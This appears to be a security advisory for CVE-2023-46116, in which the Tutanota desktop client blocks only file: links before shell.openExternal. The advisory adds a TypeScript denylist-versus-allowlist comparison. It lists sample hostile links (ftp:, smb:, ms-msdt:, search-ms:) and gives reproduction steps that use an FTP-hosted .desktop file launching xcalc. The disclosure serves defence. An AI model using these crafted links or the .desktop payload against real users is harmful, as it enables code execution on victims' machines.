Headline
CVE-2023-46116: Remote Code Execution via insufficiently sanitized call to shell.openExternal
Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the file: URL scheme, which can be used by malicious actors to gain code execution on a victim's computer, but fails to check other harmful schemes such as ftp:, smb:, etc., which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer. Version 3.118.12 contains a patch for this issue.
Summary
Tutanota allows users to open links in emails in external applications. It correctly blocks the file: URL scheme, which can be used by malicious actors to gain code execution on a victim's computer, but fails to check other harmful schemes such as ftp:, smb:, etc., which can also be used.
Details
- Observe that on #L423 in src/desktop/ApplicationWindow.ts, the parsedUrl parameter is passed into a shell.openExternal function call.
- Observe that on #L417 in src/desktop/ApplicationWindow.ts, only the file: scheme is blocked. The check is a denylist, so every scheme it does not name is handed to the operating system's registered handler for that scheme.
- An attacker can craft a malicious email containing a hyperlink using schemes such as ftp:, smb:, ms-msdt:, search-ms:, etc. to gain RCE on a victim's computer when the link is clicked.
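The scheme check described above, as an added TypeScript example that is not Tutanota's code: a hypothetical stand-in for the denylist (only file: rejected, as at #L417) beside an allowlist that refuses everything except http:, https: and mailto: before a link would reach shell.openExternal. The function names, the sample links and the address 192.0.2.10 are constructed for this example.

```typescript
// Added example, not Tutanota's code. Models the advisory's finding: a
// denylist that rejects only "file:" lets ftp:, smb:, ms-msdt:, search-ms:
// and similar schemes through, while an allowlist does not.

// Hypothetical stand-in for the vulnerable check: anything except "file:"
// is considered safe to hand to shell.openExternal().
function denylistCheck(link: string): boolean {
  let parsed: URL;
  try {
    parsed = new URL(link);
  } catch {
    return false;
  }
  return parsed.protocol !== "file:";
}

// Hardened check: parse with the WHATWG URL class, then accept only schemes
// the desktop client has a reason to open externally. Any other scheme,
// including ones nobody thought to list, is refused.
const ALLOWED_SCHEMES: ReadonlySet<string> = new Set(["http:", "https:", "mailto:"]);

function isSafeExternalLink(link: string): boolean {
  let parsed: URL;
  try {
    parsed = new URL(link);
  } catch {
    return false; // unparsable input is never opened
  }
  // URL.protocol is already lowercased and leading whitespace is stripped
  // by the parser, so " FTP://..." or "Ftp://..." cannot slip past the set.
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Constructed sample links, including the schemes named in the advisory.
const SAMPLE_LINKS: string[] = [
  "https://example.com/",
  "mailto:alice@example.com",
  "file:///etc/passwd",
  "ftp://anonymous:anonymous@192.0.2.10/pwn.desktop",
  "smb://192.0.2.10/share/pwn.desktop",
  "ms-msdt:/id PCWDiagnostic /skip force",
  "search-ms:query=pwn&crumb=location:\\\\192.0.2.10\\share",
  " FTP://192.0.2.10/pwn.desktop",
  "javascript:alert(1)",
];

// Run both checks over the sample set and return what each would let through.
function classify(links: string[]): { denylist: string[]; allowlist: string[] } {
  return {
    denylist: links.filter(denylistCheck),
    allowlist: links.filter(isSafeExternalLink),
  };
}

const result = classify(SAMPLE_LINKS);
console.log("passes the file:-only denylist:", result.denylist);
console.log("passes the allowlist:", result.allowlist);
```

Only the https: and mailto: links survive the allowlist; the denylist passes every other sample, including the ftp:// link to a .desktop file used in the PoC below. Whatever the client does after the check (confirmation dialog, opener application), the decision of which schemes are ever eligible belongs in an allowlist like this one.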
Steps to Reproduce
This PoC uses Ubuntu with the XFCE desktop environment, since that is the least complicated setup to reproduce on.
Execute and authenticate to the Tutanota desktop version 3.118.8 AppImage on an Ubuntu Desktop with the XFCE environment.
On another machine, host an FTP server with anonymous access enabled. Create and place a pwn.desktop file in the FTP root with the following content:
    [Desktop Entry]
    Exec=xcalc
    Type=Application
Send an email to the account logged in on Tutanota containing a hyperlink pointing to the pwn.desktop file on the FTP server. Replace the corresponding values in the hyperlink: ftp://username:password@ip-address/pwn.desktop.
In the Tutanota desktop application, click the hyperlink in the received email. Observe that the calculator application opens. You may need to confirm execution of the application in some cases.
PoC
- Video PoC for the final stage of the exploit (victim clicks on link in email):
https://user-images.githubusercontent.com/46137338/270564886-7a0389d3-f9ef-44e1-9f5e-57ccc72dcaa8.mp4
Impact
Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim's computer.
References
- https://positive.security/blog/url-open-rce
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps#rce-via-shell.openexternal